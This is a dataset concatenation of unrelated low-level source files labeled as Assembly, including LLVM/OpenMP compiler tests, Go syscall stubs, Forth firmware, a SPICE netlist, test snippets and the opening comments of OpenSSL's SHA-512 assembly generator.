// CHECK-DAG: [[PRIV_T_VAR_ADDR:%.+]] = alloca i32*,
// CHECK-DAG: [[PRIV_VEC_ADDR:%.+]] = alloca [2 x i32]*,
// CHECK-DAG: [[PRIV_S_ARR_ADDR:%.+]] = alloca [2 x [[S_INT_TY]]]*,
// CHECK-DAG: [[PRIV_VAR_ADDR:%.+]] = alloca [[S_INT_TY]]*,
// CHECK: store void (i8*, ...)* bitcast (void ([[PRIVATES_TMAIN_TY]]*, i32**, [2 x i32]**, [2 x [[S_INT_TY]]]**, [[S_INT_TY]]**)* [[PRIVATES_MAP_FN]] to void (i8*, ...)*), void (i8*, ...)** [[MAP_FN_ADDR:%.+]],
// CHECK: [[MAP_FN:%.+]] = load void (i8*, ...)*, void (i8*, ...)** [[MAP_FN_ADDR]],
// CHECK: call void (i8*, ...) [[MAP_FN]](i8* %{{.+}}, i32** [[PRIV_T_VAR_ADDR]], [2 x i32]** [[PRIV_VEC_ADDR]], [2 x [[S_INT_TY]]]** [[PRIV_S_ARR_ADDR]], [[S_INT_TY]]** [[PRIV_VAR_ADDR]])
// CHECK: [[PRIV_T_VAR:%.+]] = load i32*, i32** [[PRIV_T_VAR_ADDR]],
// CHECK: [[PRIV_VEC:%.+]] = load [2 x i32]*, [2 x i32]** [[PRIV_VEC_ADDR]],
// CHECK: [[PRIV_S_ARR:%.+]] = load [2 x [[S_INT_TY]]]*, [2 x [[S_INT_TY]]]** [[PRIV_S_ARR_ADDR]],
// CHECK: [[PRIV_VAR:%.+]] = load [[S_INT_TY]]*, [[S_INT_TY]]** [[PRIV_VAR_ADDR]],
// Privates actually are used.
// CHECK-DAG: [[PRIV_VAR]]
// CHECK-DAG: [[PRIV_T_VAR]]
// CHECK-DAG: [[PRIV_S_ARR]]
// CHECK-DAG: [[PRIV_VEC]]
// CHECK: ret
// CHECK: define internal void [[TMAIN_DUP]]([[KMP_TASK_TMAIN_TY]]*, [[KMP_TASK_TMAIN_TY]]*, i32)
// CHECK: getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* %{{.+}}, i32 0, i32 2
// CHECK: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* %{{.+}}, i32 0, i32 2
// CHECK: getelementptr inbounds [2 x [[S_INT_TY]]], [2 x [[S_INT_TY]]]* %{{.+}}, i32 0, i32 0
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i64 2
// CHECK: br label %
// CHECK: phi [[S_INT_TY]]*
// CHECK: call {{.*}} [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]*
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i64 1
// CHECK: icmp eq [[S_INT_TY]]* %
// CHECK: br i1 %
// CHECK: getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* %{{.+}}, i32 0, i32 3
// CHECK: call {{.*}} [[S_INT_TY_DEF_CONSTR]]([[S_INT_TY]]*
// CHECK: ret void
// CHECK: define internal i32 [[DESTRUCTORS]](i32, [[KMP_TASK_TMAIN_TY]]* noalias)
// CHECK: [[PRIVATES:%.+]] = getelementptr inbounds [[KMP_TASK_TMAIN_TY]], [[KMP_TASK_TMAIN_TY]]* [[RES_KMP_TASK:%.+]], i{{[0-9]+}} 0, i{{[0-9]+}} 2
// CHECK: [[PRIVATE_S_ARR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 2
// CHECK: [[PRIVATE_VAR_REF:%.+]] = getelementptr inbounds [[PRIVATES_TMAIN_TY]], [[PRIVATES_TMAIN_TY]]* [[PRIVATES]], i{{.+}} 0, i{{.+}} 3
// CHECK: call void [[S_INT_TY_DESTR]]([[S_INT_TY]]* [[PRIVATE_VAR_REF]])
// CHECK: getelementptr inbounds [2 x [[S_INT_TY]]], [2 x [[S_INT_TY]]]* [[PRIVATE_S_ARR_REF]], i{{.+}} 0, i{{.+}} 0
// CHECK: getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i{{.+}} 2
// CHECK: [[PRIVATE_S_ARR_ELEM_REF:%.+]] = getelementptr inbounds [[S_INT_TY]], [[S_INT_TY]]* %{{.+}}, i{{.+}} -1
// CHECK: call void [[S_INT_TY_DESTR]]([[S_INT_TY]]* [[PRIVATE_S_ARR_ELEM_REF]])
// CHECK: icmp eq
// CHECK: br i1
// CHECK: ret i32
#endif
#else
// ARRAY-LABEL: array_func
struct St {
int a, b;
St() : a(0), b(0) {}
St &operator=(const St &) { return *this; };
~St() {}
};
void array_func(int n, float a[n], St s[2]) {
// ARRAY: call i8* @__kmpc_omp_task_alloc(
// ARRAY: call void @__kmpc_taskloop(
// ARRAY: store float** %{{.+}}, float*** %{{.+}},
// ARRAY: store %struct.St** %{{.+}}, %struct.St*** %{{.+}},
#pragma omp taskloop simd private(a, s)
for (int i = 0; i < 10; ++i)
;
}
#endif
| {
"language": "Assembly"
} |
// RUN: %libomp-compile -fopenmp-version=50 && env OMP_NUM_THREADS='3' \
// RUN: %libomp-run | %sort-threads | FileCheck %s
// REQUIRES: ompt
// Checked gcc 10.1 still does not support detach clause on task construct.
// UNSUPPORTED: gcc-4, gcc-5, gcc-6, gcc-7, gcc-8, gcc-9, gcc-10
// clang supports detach clause since version 11.
// UNSUPPORTED: clang-10, clang-9, clang-8, clang-7
// icc compiler does not support detach clause.
// UNSUPPORTED: icc
#include "callback.h"
#include <omp.h>
int main() {
#pragma omp parallel
#pragma omp master
{
omp_event_handle_t event;
omp_event_handle_t *f_event;
#pragma omp task detach(event) depend(out : f_event) shared(f_event) if (0)
{
printf("task 1\n");
f_event = &event;
}
#pragma omp task depend(in : f_event)
{ printf("task 2\n"); }
printf("calling omp_fulfill_event\n");
omp_fulfill_event(*f_event);
#pragma omp taskwait
}
return 0;
}
// Check if libomp supports the callbacks for this test.
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_task_create'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_task_schedule'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_parallel_begin'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_parallel_end'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_implicit_task'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_mutex_acquire'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_mutex_acquired'
// CHECK-NOT: {{^}}0: Could not register callback 'ompt_callback_mutex_released'
// CHECK: {{^}}0: NULL_POINTER=[[NULL:.*$]]
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_parallel_begin:
// CHECK-SAME: parent_task_id=[[PARENT_TASK_ID:[0-9]+]],
// CHECK-SAME: parent_task_frame.exit=[[NULL]],
// CHECK-SAME: parent_task_frame.reenter=0x{{[0-f]+}},
// CHECK-SAME: parallel_id=[[PARALLEL_ID:[0-9]+]],
// CHECK-SAME: requested_team_size=3,
// CHECK: {{^}}[[MASTER_ID]]: ompt_event_implicit_task_begin:
// CHECK-SAME: parallel_id=[[PARALLEL_ID]],
// CHECK-SAME: task_id=[[IMPLICIT_TASK_ID:[0-9]+]]
// The following is to match the taskwait task created in __kmpc_omp_wait_deps
// this should go away, once codegen for "detached if(0)" is fixed
// CHECK: {{^}}[[MASTER_ID]]: ompt_event_task_create:
// CHECK-SAME: parent_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: has_dependences=yes
// CHECK: {{^}}[[MASTER_ID]]: ompt_event_task_create:
// CHECK-SAME: parent_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: parent_task_frame.exit=0x{{[0-f]+}},
// CHECK-SAME: parent_task_frame.reenter=0x{{[0-f]+}},
// CHECK-SAME: new_task_id=[[TASK_ID:[0-9]+]],
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_task_schedule:
// CHECK-SAME: first_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: second_task_id=[[TASK_ID]],
// CHECK-SAME: prior_task_status=ompt_task_switch=7
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_task_schedule:
// CHECK-SAME: first_task_id=[[TASK_ID]],
// CHECK-SAME: second_task_id=[[IMPLICIT_TASK_ID]],
// CHECK-SAME: prior_task_status=ompt_task_detach=4
// CHECK: {{^}}[[MASTER_ID:[0-9]+]]: ompt_event_task_schedule:
// CHECK-SAME: first_task_id=[[TASK_ID]],
// CHECK-SAME: second_task_id=18446744073709551615,
// CHECK-SAME: prior_task_status=ompt_task_late_fulfill=6
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for 386, OpenBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
;Made from driveimage.bmp using driveimageconv.cpp
dta %00000000,%00000000,%00000000,%00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000,%00000000,%00000000,%00000000
dta %00000010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101000,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%00000000
dta %00101010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11010101,%10100000
dta %10100101,%01010101,%01010111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11010101,%10100000
dta %10100101,%01010101,%01010111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11111111,%11010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10100101,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010101,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %10101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10100000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%11111111,%11111111,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101001,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010110,%10000000
dta %00101010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%10000000
dta %00001010,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01010101,%01011010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000
dta %00000010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101010,%10101000,%00000000
dta %00000000,%00000000,%00000000,%00001010,%10101010,%10101010,%10101010,%10101010,%10101010,%00000000,%00000000,%00000000,%00000000
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, Darwin
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
\ *****************************************************************************
\ * Copyright (c) 2004, 2008 IBM Corporation
\ * All rights reserved.
\ * This program and the accompanying materials
\ * are made available under the terms of the BSD License
\ * which accompanies this distribution, and is available at
\ * http://www.opensource.org/licenses/bsd-license.php
\ *
\ * Contributors:
\ * IBM Corporation - initial implementation
\ ****************************************************************************/
\ Starting alias number for net devices after the onboard devices.
2 VALUE pci-net-num
\ Starting alias number for disks after the onboard devices.
0 VALUE pci-disk-num
\ Starting alias number for cdroms after the onboard devices.
0 VALUE pci-cdrom-num
\ define a new alias for this device
: pci-set-alias ( str-addr str-len num -- )
$cathex strdup \ create alias name
get-node node>path \ get path string
set-alias \ and set the alias
;
\ define a new net alias
: unknown-enet ( -- pci-net-num )
pci-net-num dup 1+ TO pci-net-num
;
: pci-alias-net ( config-addr -- )
u3? IF
pci-device-vec c@ CASE
2 OF pci-device-vec-len 1 >= IF
pci-device-vec 1+ c@ CASE
1 OF dup pci-addr2fn 1 >= IF 1 ELSE 0 THEN ENDOF
dup OF unknown-enet ENDOF
ENDCASE
ELSE
unknown-enet
THEN
ENDOF
dup OF unknown-enet ENDOF
ENDCASE
ELSE
pci-device-vec c@ CASE
2 OF pci-device-vec-len 1 >= IF
pci-device-vec 1+ c@ CASE
4 OF dup pci-addr2fn 1 >= IF 1 ELSE 0 THEN ENDOF
dup OF unknown-enet ENDOF
ENDCASE
ELSE
unknown-enet
THEN
ENDOF
dup OF unknown-enet ENDOF
ENDCASE
THEN
swap drop \ forget the config address
s" net" rot pci-set-alias \ create the alias
;
\ define a new disk alias
: pci-alias-disk ( config-addr -- )
drop \ forget the config address
pci-disk-num dup 1+ TO pci-disk-num \ increase the pci-disk-num
s" disk" rot pci-set-alias \ create the alias
;
\ define a new cdrom alias
: pci-alias-cdrom ( config-addr -- )
drop \ forget the config address
pci-cdrom-num dup 1+ TO pci-cdrom-num \ increase the pci-cdrom-num
s" cdrom" rot pci-set-alias \ create the alias
;
\ define the alias for the calling device
: pci-alias ( config-addr -- )
dup pci-class@
10 rshift CASE
01 OF pci-alias-disk ENDOF
02 OF pci-alias-net ENDOF
dup OF drop ENDOF
ENDCASE
;
| {
"language": "Assembly"
} |
* Extracted by KLayout
* cell RINGO
* pin FB
* pin VDD
* pin OUT
* pin ENABLE
* pin VSS
.SUBCKT RINGO 11 12 13 14 15
* net 11 FB
* net 12 VDD
* net 13 OUT
* net 14 ENABLE
* net 15 VSS
* cell instance $1 r0 *1 1.8,0
X$1 12 1 15 12 11 14 15 ND2X1
* cell instance $2 r0 *1 4.2,0
X$2 12 2 15 12 1 15 INVX1
* cell instance $3 r0 *1 6,0
X$3 12 3 15 12 2 15 INVX1
* cell instance $4 r0 *1 7.8,0
X$4 12 4 15 12 3 15 INVX1
* cell instance $5 r0 *1 9.6,0
X$5 12 5 15 12 4 15 INVX1
* cell instance $6 r0 *1 11.4,0
X$6 12 6 15 12 5 15 INVX1
* cell instance $7 r0 *1 13.2,0
X$7 12 7 15 12 6 15 INVX1
* cell instance $8 r0 *1 15,0
X$8 12 8 15 12 7 15 INVX1
* cell instance $9 r0 *1 16.8,0
X$9 12 9 15 12 8 15 INVX1
* cell instance $10 r0 *1 18.6,0
X$10 12 10 15 12 9 15 INVX1
* cell instance $11 r0 *1 20.4,0
X$11 12 11 15 12 10 15 INVX1
* cell instance $12 r0 *1 22.2,0
X$12 12 13 15 12 11 15 INVX1
.ENDS RINGO
* cell INVX1
* pin VDD
* pin OUT
* pin VSS
* pin
* pin IN
* pin SUBSTRATE
.SUBCKT INVX1 1 2 3 4 5 6
* net 1 VDD
* net 2 OUT
* net 3 VSS
* net 5 IN
* net 6 SUBSTRATE
* device instance $1 r0 *1 0.85,5.8 PMOS
M$1 1 5 2 4 PMOS L=0.25U W=1.5U AS=0.6375P AD=0.6375P PS=3.85U PD=3.85U
* device instance $2 r0 *1 0.85,2.135 NMOS
M$2 3 5 2 6 NMOS L=0.25U W=0.95U AS=0.40375P AD=0.40375P PS=2.75U PD=2.75U
.ENDS INVX1
* cell ND2X1
* pin VDD
* pin OUT
* pin VSS
* pin
* pin B
* pin A
* pin SUBSTRATE
.SUBCKT ND2X1 1 2 3 4 5 6 7
* net 1 VDD
* net 2 OUT
* net 3 VSS
* net 5 B
* net 6 A
* net 7 SUBSTRATE
* device instance $1 r0 *1 0.85,5.8 PMOS
M$1 2 6 1 4 PMOS L=0.25U W=1.5U AS=0.6375P AD=0.3375P PS=3.85U PD=1.95U
* device instance $2 r0 *1 1.55,5.8 PMOS
M$2 1 5 2 4 PMOS L=0.25U W=1.5U AS=0.3375P AD=0.6375P PS=1.95U PD=3.85U
* device instance $3 r0 *1 0.85,2.135 NMOS
M$3 3 6 8 7 NMOS L=0.25U W=0.95U AS=0.40375P AD=0.21375P PS=2.75U PD=1.4U
* device instance $4 r0 *1 1.55,2.135 NMOS
M$4 8 5 2 7 NMOS L=0.25U W=0.95U AS=0.21375P AD=0.40375P PS=1.4U PD=2.75U
.ENDS ND2X1
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -reassociate -dce -S | FileCheck %s
; PR12985
; Verify the nsw flags are preserved when converting shl to mul.
define i32 @shl_to_mul_nsw(i32 %i) {
;
; CHECK-LABEL: @shl_to_mul_nsw(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[MUL:%.*]] = mul i32 [[I:%.*]], -2147483648
; CHECK-NEXT: [[MUL2:%.*]] = add i32 [[MUL]], 1
; CHECK-NEXT: ret i32 [[MUL2]]
;
entry:
%mul = shl nsw i32 %i, 31
%mul2 = add i32 %mul, 1
ret i32 %mul2
}
define i32 @shl_to_mul_nuw(i32 %i) {
;
; CHECK-LABEL: @shl_to_mul_nuw(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[MUL:%.*]] = mul nuw i32 [[I:%.*]], 4
; CHECK-NEXT: [[MUL2:%.*]] = add i32 [[MUL]], 1
; CHECK-NEXT: ret i32 [[MUL2]]
;
entry:
%mul = shl nuw i32 %i, 2
%mul2 = add i32 %mul, 1
ret i32 %mul2
}
define i32 @shl_to_mul_nuw_nsw(i32 %i) {
;
; CHECK-LABEL: @shl_to_mul_nuw_nsw(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[MUL:%.*]] = mul nuw nsw i32 [[I:%.*]], 4
; CHECK-NEXT: [[MUL2:%.*]] = add i32 [[MUL]], 1
; CHECK-NEXT: ret i32 [[MUL2]]
;
entry:
%mul = shl nuw nsw i32 %i, 2
%mul2 = add i32 %mul, 1
ret i32 %mul2
}
define i2 @pr23926(i2 %X1, i2 %X2) {
;
; CHECK-LABEL: @pr23926(
; CHECK-NEXT: [[X1_NEG:%.*]] = sub i2 0, [[X1:%.*]]
; CHECK-NEXT: [[ADD_NEG:%.*]] = add i2 [[X1_NEG]], -1
; CHECK-NEXT: [[SUB:%.*]] = add i2 [[ADD_NEG]], [[X2:%.*]]
; CHECK-NEXT: ret i2 [[SUB]]
;
%add = add nuw i2 %X1, 1
%sub = sub nuw nsw i2 %X2, %add
ret i2 %sub
}
| {
"language": "Assembly"
} |
# m32r testcase for and3 $dr,$sr,#$uimm16
# mach(): m32r m32rx
.include "testutils.inc"
start
.global and3
and3:
mvi_h_gr r4, 0
mvi_h_gr r5, 6
and3 r4, r5, #3
test_h_gr r4, 2
pass
| {
"language": "Assembly"
} |
#+REVEAL_THEME: sky
#+OPTIONS: toc:nil num:nil
#+TITLE: My Awesome Presentation
#+AUTHOR: Mike Zamansky
* Slide 1
here's some text
* Slide 2
** subslide 1
** subslide 2
* Slide 3
#+ATTR_REVEAL: :frag (roll-in)
- list item 1
- list item 2
| a | b | c |
|---+---+---|
| 1 | 2 | 3 |
| 4 | 5 | 6 |
|---+---+---|
* slide 4
#+BEGIN_SRC python
def f(x):
return x + 1
print f(5)
#+END_SRC
| {
"language": "Assembly"
} |
; RUN: opt < %s -loop-reduce -disable-output
define void @try_swap() {
entry:
br i1 false, label %cond_continue.0.i, label %cond_false.0.i
cond_false.0.i: ; preds = %entry
ret void
cond_continue.0.i: ; preds = %entry
br i1 false, label %cond_continue.1.i, label %cond_false.1.i
cond_false.1.i: ; preds = %cond_continue.0.i
ret void
cond_continue.1.i: ; preds = %cond_continue.0.i
br i1 false, label %endif.3.i, label %else.0.i
endif.3.i: ; preds = %cond_continue.1.i
br i1 false, label %my_irand.exit82, label %endif.0.i62
else.0.i: ; preds = %cond_continue.1.i
ret void
endif.0.i62: ; preds = %endif.3.i
ret void
my_irand.exit82: ; preds = %endif.3.i
br i1 false, label %else.2, label %then.4
then.4: ; preds = %my_irand.exit82
ret void
else.2: ; preds = %my_irand.exit82
br i1 false, label %find_affected_nets.exit, label %loopentry.1.i107.outer.preheader
loopentry.1.i107.outer.preheader: ; preds = %else.2
ret void
find_affected_nets.exit: ; preds = %else.2
br i1 false, label %save_region_occ.exit, label %loopentry.1
save_region_occ.exit: ; preds = %find_affected_nets.exit
br i1 false, label %no_exit.1.preheader, label %loopexit.1
loopentry.1: ; preds = %find_affected_nets.exit
ret void
no_exit.1.preheader: ; preds = %save_region_occ.exit
ret void
loopexit.1: ; preds = %save_region_occ.exit
br i1 false, label %then.10, label %loopentry.3
then.10: ; preds = %loopexit.1
ret void
loopentry.3: ; preds = %endif.16, %loopexit.1
%indvar342 = phi i32 [ %indvar.next343, %endif.16 ], [ 0, %loopexit.1 ] ; <i32> [#uses=2]
br i1 false, label %loopexit.3, label %endif.16
endif.16: ; preds = %loopentry.3
%indvar.next343 = add i32 %indvar342, 1 ; <i32> [#uses=1]
br label %loopentry.3
loopexit.3: ; preds = %loopentry.3
br label %loopentry.4
loopentry.4: ; preds = %loopentry.4, %loopexit.3
%indvar340 = phi i32 [ 0, %loopexit.3 ], [ %indvar.next341, %loopentry.4 ] ; <i32> [#uses=2]
%tmp. = add i32 %indvar340, %indvar342 ; <i32> [#uses=1]
%tmp.526 = load i32*, i32** null ; <i32*> [#uses=1]
%gep.upgrd.1 = zext i32 %tmp. to i64 ; <i64> [#uses=1]
%tmp.528 = getelementptr i32, i32* %tmp.526, i64 %gep.upgrd.1 ; <i32*> [#uses=1]
store i32 0, i32* %tmp.528
%indvar.next341 = add i32 %indvar340, 1 ; <i32> [#uses=1]
br label %loopentry.4
}
| {
"language": "Assembly"
} |
.type b_val, %gnu_unique_object
b_val: .long 0
.size b_val, .-b_val
| {
"language": "Assembly"
} |
; RUN: llvm-dis < %s.bc | FileCheck %s
define void @f2(i32* %x, i32 %y.orig, i32 %z) {
entry:
br label %a
b:
cmpxchg i32* %x, i32 %y, i32 %z acquire acquire
; CHECK: cmpxchg i32* %x, i32 %y, i32 %z acquire acquire
ret void
a:
%y = add i32 %y.orig, 1
br label %a
}
| {
"language": "Assembly"
} |
#!/usr/bin/env perl
#
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. Rights for redistribution and usage in source and binary
# forms are granted according to the OpenSSL license.
# ====================================================================
#
# sha256/512_block procedure for x86_64.
#
# 40% improvement over compiler-generated code on Opteron. On EM64T
# sha256 was observed to run >80% faster and sha512 - >40%. No magical
# tricks, just straight implementation... I really wonder why gcc
# [being armed with inline assembler] fails to generate as fast code.
# The only thing which is cool about this module is that it's very
# same instruction sequence used for both SHA-256 and SHA-512. In
# former case the instructions operate on 32-bit operands, while in
# latter - on 64-bit ones. All I had to do is to get one flavor right,
# the other one passed the test right away:-)
#
# sha256_block runs in ~1005 cycles on Opteron, which gives you
# asymptotic performance of 64*1000/1005=63.7MBps times CPU clock
# frequency in GHz. sha512_block runs in ~1275 cycles, which results
# in 128*1000/1275=100MBps per GHz. Is there room for improvement?
# Well, if you compare it to IA-64 implementation, which maintains
# X[16] in register bank[!], tends to 4 instructions per CPU clock
# cycle and runs in 1003 cycles, 1275 is very good result for 3-way
# issue Opteron pipeline and X[16] maintained in memory. So that *if*
# there is a way to improve it, *then* the only way would be to try to
# offload X[16] updates to SSE unit, but that would require "deeper"
# loop unroll, which in turn would naturally cause size blow-up, not
# to mention increased complexity! And once again, only *if* it's
# actually possible to noticeably improve overall ILP, instruction
# level parallelism, on a given CPU implementation in this case.
#
# Special note on Intel EM64T. While Opteron CPU exhibits perfect
# perfromance ratio of 1.5 between 64- and 32-bit flavors [see above],
# [currently available] EM64T CPUs apparently are far from it. On the
# contrary, 64-bit version, sha512_block, is ~30% *slower* than 32-bit
# sha256_block:-( This is presumably because 64-bit shifts/rotates
# apparently are not atomic instructions, but implemented in microcode.
#
# May 2012.
#
# Optimization including one of Pavel Semjanov's ideas, alternative
# Maj, resulted in >=5% improvement on most CPUs, +20% SHA256 and
# unfortunately -2% SHA512 on P4 [which nobody should care about
# that much].
#
# June 2012.
#
# Add SIMD code paths, see below for improvement coefficients. SSSE3
# code path was not attempted for SHA512, because improvement is not
# estimated to be high enough, noticeably less than 9%, to justify
# the effort, not on pre-AVX processors. [Obviously with exclusion
# for VIA Nano, but it has SHA512 instruction that is faster and
# should be used instead.] For reference, corresponding estimated
# upper limit for improvement for SSSE3 SHA256 is 28%. The fact that
# higher coefficients are observed on VIA Nano and Bulldozer has more
# to do with specifics of their architecture [which is topic for
# separate discussion].
#
# November 2012.
#
# Add AVX2 code path. Two consecutive input blocks are loaded to
# 256-bit %ymm registers, with data from first block to least
# significant 128-bit halves and data from second to most significant.
# The data is then processed with same SIMD instruction sequence as
# for AVX, but with %ymm as operands. Side effect is increased stack
# frame, 448 additional bytes in SHA256 and 1152 in SHA512, and 1.2KB
# code size increase.
#
# March 2014.
#
# Add support for Intel SHA Extensions.
######################################################################
# Current performance in cycles per processed byte (less is better):
#
# SHA256 SSSE3 AVX/XOP(*) SHA512 AVX/XOP(*)
#
# AMD K8 14.9 - - 9.57 -
# P4 17.3 - - 30.8 -
# Core 2 15.6 13.8(+13%) - 9.97 -
# Westmere 14.8 12.3(+19%) - 9.58 -
# Sandy Bridge 17.4 14.2(+23%) 11.6(+50%(**)) 11.2 8.10(+38%(**))
